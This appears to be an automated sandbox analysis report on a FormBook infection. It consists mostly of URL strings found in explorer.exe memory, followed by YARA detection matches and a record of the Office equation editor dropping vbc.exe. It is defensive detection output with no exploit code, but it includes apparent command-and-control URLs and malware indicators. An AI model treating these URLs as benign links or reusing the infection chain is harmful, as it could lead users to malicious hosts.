          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000009.00000000.2160663488.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000009.00000000.2170312578.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E20000 page execute and read and write
